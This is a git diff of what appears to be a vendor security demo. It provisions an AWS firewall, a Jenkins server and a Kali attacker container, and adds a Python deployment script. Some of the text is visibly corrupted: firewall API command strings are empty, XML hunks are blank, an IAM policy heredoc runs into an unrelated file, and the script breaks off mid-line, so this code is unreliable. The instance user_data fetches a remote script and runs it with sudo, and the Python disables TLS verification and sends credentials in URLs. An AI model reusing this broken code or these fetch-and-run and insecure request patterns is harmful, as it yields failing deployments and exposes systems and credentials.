diff --git a/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml index 8d552e84..48a08a34 100644 --- a/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml +++ b/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml @@ -17,7 +17,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: AWS Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application @@ -40,16 +40,40 @@ variables: type_hint: password - name: aws_region description: AWS Region - default: us-east-2 - type_hint: text + type_hint: dropdown + dd_list: + - key: "us-west-1--- N.California" + value: "us-west-1" + - key: "us-west-2--- Oregon" + value: "us-west-2" + - key: "us-east-1--- N.Virginia" + value: "us-east-1" + - key: "us-east-2--- Ohio" + value: "us-east-2" + - key: "ca-central-1--- Canada Central" + value: "ca-central-1" + - key: "eu-west-1--- Ireland" + value: "eu-west-1" + - key: "eu-west-2--- London" + value: "eu-west-2" + - key: "eu-central-1--- Frankfurt" + value: "eu-central-1" + - key: "ap-east-1--- Hong Kong" + value: "ap-east-1" + - key: "ap-northeast-1--- Tokyo" + value: "ap-northeast-1" + - key: "ap-southeast-1--- Singapore" + value: "ap-southeast-1" + - key: "ap-southeast-2--- Sydney" + value: "ap-southeast-2" + - key: "ap-south-1--- Mumbai" + value: "ap-south-1" + - key: "sa-east-1--- Sao Paulo" + value: "sa-east-1" - name: aws_key_pair description: AWS Key Pair default: us-east-2-kp type_hint: text - - name: s3_bootstrap_bucket - description: S3 Bootstrap Bucket - default: unique_value - type_hint: text # Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath # determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file diff --git a/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml index 294792be..e83fc4aa 100644 --- a/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml +++ b/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml @@ -15,7 +15,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: AWS Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml index a312b3aa..4cdb1e69 100644 --- a/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml +++ b/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml @@ -17,7 +17,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: AWS Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml index 04548635..f139a57b 100644 --- a/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml +++ b/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml @@ -15,7 +15,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: AWS Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf b/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf index 03887cc2..ebd01015 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf +++ b/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf @@ -14,9 +14,6 @@ variable "FW1_Untrust_IP" {} variable "FW1_Trust_IP" {} variable "FW1_mgmt_IP" {} - -variable "bootstrap_s3bucket" {} - variable "VPCName" {} variable "VPCCIDR" {} variable "ServerKeyName" {} @@ -52,20 +49,20 @@ variable "kali" { type = "map" default = { - "us-east-1" = "ami-092d0d014b7b31a08" - "us-east-2" = "ami-0a444079f17309e2a" - "us-west-1" = "ami-03e0ff3de0548396b" - "us-west-2" = "ami-07c2e617785343806" - "eu-west-1" = "ami-04bbe683cac096622" - "eu-west-2" = "ami-05f478183aa65246f" - "ap-northeast-1" = "ami-0093e807f67a5f1e7" - "ap-northeast-2" = "ami-06ffd66e21c3ceb62" - "ap-southeast-1" = "ami-0e22510ff08cbb147" - "ap-southeast-2" = "ami-0d4437b6104e6b9bd" - "eu-central-1" = "ami-08b17dda213f62471" - "sa-east-1" = "ami-05cfb15d232b8be2a" - "ca-central-1" = "ami-0e4c58a6a5ae9e417" - "ap-south-1" = "ami-0b13a1e1e3db28939" + "us-west-1" = "ami-0a3a5bb61a81e3135" + "us-west-2" = "ami-000de76905d16b042" + "us-east-1" = "ami-021d9d94f93a07a43" + "us-east-2" = "ami-04239d579c52de263" + "ca-central-1" = "ami-00ecb370195d6a225" + "eu-west-1" = "ami-09e0dc5839aa7eca9" + "eu-west-2" = "ami-0629d16d9e818369f" + "eu-central-1" = "ami-0d30b058bf84b0a0c" + "ap-east-1" = "ami-72661d03" + "ap-northeast-1" = "ami-0910fb379f9c0dda9" + "ap-southeast-1" = "ami-0dff5e99784353c4a" + "ap-southeast-2" = "ami-042ed6b729919aa24" + "ap-south-1" = "ami-0f382fa26248923ea" + "sa-east-1" = "ami-027c2142d479531cb" } } @@ -74,19 +71,19 @@ variable "UbuntuRegionMap" { #Ubuntu Server 16.04 LTS (HVM) default = { - "us-east-1" = "ami-092d0d014b7b31a08" - "us-east-2" = "ami-0a444079f17309e2a" - "us-west-1" = "ami-03e0ff3de0548396b" - "us-west-2" = "ami-07c2e617785343806" - "eu-west-1" = "ami-04bbe683cac096622" - "eu-west-2" = "ami-05f478183aa65246f" - "ap-northeast-1" = "ami-0093e807f67a5f1e7" - "ap-northeast-2" = "ami-06ffd66e21c3ceb62" - "ap-southeast-1" = "ami-0e22510ff08cbb147" - "ap-southeast-2" = "ami-0d4437b6104e6b9bd" - "eu-central-1" = "ami-08b17dda213f62471" - "sa-east-1" = "ami-05cfb15d232b8be2a" - "ca-central-1" = "ami-0e4c58a6a5ae9e417" - "ap-south-1" = "ami-0b13a1e1e3db28939" + "us-west-1" = "ami-0a3a5bb61a81e3135" + "us-west-2" = "ami-000de76905d16b042" + "us-east-1" = "ami-021d9d94f93a07a43" + "us-east-2" = "ami-04239d579c52de263" + "ca-central-1" = "ami-00ecb370195d6a225" + "eu-west-1" = "ami-09e0dc5839aa7eca9" + "eu-west-2" = "ami-0629d16d9e818369f" + "eu-central-1" = "ami-0d30b058bf84b0a0c" + "ap-east-1" = "ami-72661d03" + "ap-northeast-1" = "ami-0910fb379f9c0dda9" + "ap-southeast-1" = "ami-0dff5e99784353c4a" + "ap-southeast-2" = "ami-042ed6b729919aa24" + "ap-south-1" = "ami-0f382fa26248923ea" + "sa-east-1" = "ami-027c2142d479531cb" } } diff --git a/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf b/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf index a6d7cdef..411c7ff1 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf +++ b/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf @@ -1,7 +1,18 @@ # Create a BootStrap S3 Bucket +resource "random_id" "bucket_prefix" { + byte_length = 4 +} + +#data "aws_s3_bucket" "jenkins" { +# bucket = "bootstrap_bucket" + +#region = "${var.aws_region}" +#} + resource "aws_s3_bucket" "bootstrap_bucket" { - bucket = "${var.bootstrap_s3bucket}" + #bucket_prefix = "${var.bucket_prefix}" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" acl = "private" force_destroy = true @@ -10,38 +21,42 @@ resource "aws_s3_bucket" "bootstrap_bucket" { } } -# Create Folders and Upload Bootstrap Files resource "aws_s3_bucket_object" "bootstrap_xml" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "config/bootstrap.xml" - source = "bootstrap/bootstrap.xml" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap/bootstrap.xml" } resource "aws_s3_bucket_object" "init-cft_txt" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "config/init-cfg.txt" - source = "bootstrap/init-cfg.txt" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap/init-cfg.txt" } resource "aws_s3_bucket_object" "software" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "software/" - source = "/dev/null" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + acl = "private" + key = "software/" + source = "/dev/null" } resource "aws_s3_bucket_object" "license" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "license/" - source = "/dev/null" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + acl = "private" + key = "license/" + source = "/dev/null" } resource "aws_s3_bucket_object" "content" { - bucket = "${aws_s3_bucket.bootstrap_bucket.id}" - acl = "private" - key = "content/" - source = "/dev/null" + bucket = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.bootstrap_bucket"] + acl = "private" + key = "content/" + source = "/dev/null" } diff --git a/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml index adf9834a..e528f907 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml +++ b/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml @@ -741,13 +741,6 @@ - - - - download-and-install - - - diff --git a/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf b/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf index 4569fbf9..fda987d9 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf +++ b/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf @@ -1,5 +1,17 @@ -resource "aws_iam_role" "JFFBootstrapRole" { - name = "JFFBootstrapRole" +resource "random_id" "bootstraprole" { + byte_length = 3 +} + +resource "random_id" "bootstrappolicy" { + byte_length = 3 +} + +resource "random_id" "bootstrapinstanceprofile" { + byte_length = 3 +} + +resource "aws_iam_role" "jenkins-bootstraprole" { + name = "jenkins-bootstraprole-${random_id.bootstraprole.hex}" assume_role_policy = < docker-compose.yml +echo "services:" >> docker-compose.yml +echo " attacker:" >> docker-compose.yml +echo " image: pglynn/kali:latest" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"443:443\"" >> docker-compose.yml +echo " - \"5000:5000\"" >> docker-compose.yml +docker-compose up -d diff --git a/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh new file mode 100644 index 00000000..bb37c3e5 --- /dev/null +++ b/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh @@ -0,0 +1,17 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " jenkins:" >> docker-compose.yml +echo " image: pglynn/jenkins:latest" >> docker-compose.yml +echo " environment:" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"50000:50000\"" >> docker-compose.yml +echo " - \"8080:8080\"" >> docker-compose.yml +docker-compose up -d diff --git a/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars index 8e91975f..08cc43f9 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars +++ b/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars @@ -28,8 +28,6 @@ aws_region = "Region Here" ServerKeyName = "Keypair Here" -bootstrap_s3bucket = "Unique S3 Bucketname" - aws_access_key = "AWS Key" aws_secret_key = "AWS Secret Key" diff --git a/aws/Jenkins_proj-master/WebInDeploy/webservers.tf b/aws/Jenkins_proj-master/WebInDeploy/webservers.tf index b5beed04..09986a72 100644 --- a/aws/Jenkins_proj-master/WebInDeploy/webservers.tf +++ b/aws/Jenkins_proj-master/WebInDeploy/webservers.tf @@ -28,17 +28,10 @@ resource "aws_instance" "web1" { user_data = "${base64encode(join("", list( "#! /bin/bash\n", - "sudo su\n", - "apt-get update\n", - "apt-get update\n", - "apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes\n", - "pip3 install docker-compose\n", - "cd /var/tmp\n", - "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile\n", - "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml\n", - "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh\n", - "docker-compose build\n", - "docker-compose up -d\n" + "sudo cd /var/tmp\n", + "sudo wget -O initialize_webserver.sh https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh\n", + "sudo chmod 755 initialize_webserver.sh &&\n", + "sudo bash ./initialize_webserver.sh\n" ))) }" } diff --git a/aws/Jenkins_proj-master/attacker/Dockerfile b/aws/Jenkins_proj-master/attacker/Dockerfile index 9a63391d..3f2f2072 100644 --- a/aws/Jenkins_proj-master/attacker/Dockerfile +++ b/aws/Jenkins_proj-master/attacker/Dockerfile @@ -39,4 +39,4 @@ ENTRYPOINT ["/bin/tini", "--"] ENV FLASK_APP=/root/exp-server.py # CMD ["/usr/local/bin/run.sh"] -CMD ["flask run --host=0.0.0.0"] +CMD ["flask", "run", "--host=0.0.0.0"] diff --git a/aws/Jenkins_proj-master/attacker/docker-compose.yml b/aws/Jenkins_proj-master/attacker/docker-compose.yml index 812bba77..02cdb71b 100644 --- a/aws/Jenkins_proj-master/attacker/docker-compose.yml +++ b/aws/Jenkins_proj-master/attacker/docker-compose.yml @@ -4,4 +4,5 @@ services: build: . container_name: attacker ports: - - "443:443" \ No newline at end of file + - "443:443" + - "5000:5000" diff --git a/aws/Jenkins_proj-master/deploy-v2.py b/aws/Jenkins_proj-master/deploy-v2.py new file mode 100644 index 00000000..56763e3d --- /dev/null +++ b/aws/Jenkins_proj-master/deploy-v2.py @@ -0,0 +1,674 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py -u -p -r -j + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict +import requests +import urllib3 + +from azure.common import AzureException +from azure.storage.file import FileService + + +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + """ + Handles sending requests to API + :param call: url + :return: Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + +def walkdict(d, key): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + stack = d.items() + while stack: + k, v = stack.pop() + if isinstance (v, OrderedDict): + stack.extend(v.iteritems()) + else: + if k == key: + value = v + return value + + + +def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid =0 + jobid = '' + key ='job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete " ) + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + else: + logger.info('Unable to determine job status') + + + # install latest anti-virus update without committing + getjobid =0 + jobid = '' + key ='job' + while getjobid == 0: + try: + + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + + else: + logger.info('Unable to determine job status') + + +def getApiKey(hostname, username, password): + + """ + Generates a Paloaltonetworks api key from username and password credentials + :param hostname: Ip address of firewall + :param username: + :param password: + :return: api_key API key for firewall + """ + + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + """ + For tracking purposes. Write responses to file. + :param key: + :param value: + :return: + """ + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def create_azure_fileshare(share_prefix, account_name, account_key): + """ + Generate a unique share name to avoid overlaps in shared infra + :param share_prefix: + :param account_name: + :param account_key: + :return: + """ + + # FIXME - Need to remove hardcoded directoty link below + + d_dir = './WebInDeploy/bootstrap' + share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4())) + print('using share_name of: {}'.format(share_name)) + + # archive_file_path = _create_archive_directory(files, share_prefix) + + try: + # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this + s = requests.Session() + s.verify = False + + file_service = FileService(account_name=account_name, account_key=account_key, request_session=s) + + # print(file_service) + if not file_service.exists(share_name): + file_service.create_share(share_name) + + for d in ['config', 'content', 'software', 'license']: + print('creating directory of type: {}'.format(d)) + if not file_service.exists(share_name, directory_name=d): + file_service.create_directory(share_name, d) + + # FIXME - We only handle bootstrap files. May need to handle other dirs + + if d == 'config': + for filename in os.listdir(d_dir): + print('creating file: {0}'.format(filename)) + file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename)) + + except AttributeError as ae: + # this can be returned on bad auth information + print(ae) + return "Authentication or other error creating bootstrap file_share in Azure" + + except AzureException as ahe: + print(ahe) + return str(ahe) + except ValueError as ve: + print(ve) + return str(ve) + + print('all done') + return share_name + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 15 + while True: + if count < max_count: + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def apply_tf(working_dir, vars, description): + + """ + Handles terraform operations and returns variables in outputs.tf as a dict. + :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + + """ + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) + + # Create Bootstrap + + tf = Terraform(working_dir=working_dir) + + tf.cmd('init') + if run_plan: + + # print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output, + skip_plan = True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) + + return (return_code, outputs) + + +def main(username, password, rg_name, azure_region): + + """ + Main function + :param username: + :param password: + :param rg_name: Resource group name prefix + :param azure_region: Region + :return: + """ + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # + return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap') + + if return_code == 0: + share_prefix = 'jenkins-demo' + resource_group = outputs['Resource_Group']['value'] + bootstrap_bucket = outputs['Bootstrap_Bucket']['value'] + storage_account_access_key = outputs['Storage_Account_Access_Key']['value'] + update_status('web_in_bootstrap_status', 'success') + else: + logger.info("WebInBootstrap failed") + update_status('web_in_bootstap_status', 'error') + print(json.dumps(status_output)) + exit(1) + + + share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) + + WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key}) + WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket}) + WebInDeploy_vars.update({'RG_Name': resource_group}) + WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) + WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + + # + # Build Infrastructure + # + # + + + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy') + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) + + + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value'] + nlbDns = web_in_deploy_output['NLB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + else: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + # + # Check firewall is up and running + # + # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to 